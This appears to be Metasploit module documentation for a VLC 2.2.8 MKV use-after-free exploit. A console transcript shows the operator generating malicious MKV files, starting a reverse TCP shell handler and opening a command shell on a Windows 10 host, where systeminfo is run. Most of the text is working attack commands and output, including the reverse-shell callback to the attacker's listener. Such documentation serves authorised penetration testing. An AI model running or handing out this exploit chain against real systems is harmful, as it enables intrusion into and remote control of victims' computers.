1.7 KiB
1.7 KiB
Description
VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.
This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.
Vulnerable Application
VLC <= v2.2.8
Verification Steps
./msfconsole -quse exploit/windows/fileformat/vlc_mkvrun- Start handler
- Copy over mkv files to target hosts and open part1 in VLC
- Set a shell
Scenarios
Windows 10 x64 running VLC 2.2.8 (x64)
msf5 > use exploit/windows/fileformat/vlc_mkv
msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134
lhost => 172.22.222.134
msf5 exploit(windows/fileformat/vlc_mkv) > run
[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf5 exploit(windows/fileformat/vlc_mkv) >
[*] Started reverse TCP handler on 172.22.222.134:4444
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...
systeminfo
systeminfo
Host Name: DESKTOP-IPOGIJR
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.17134 N/A Build 17134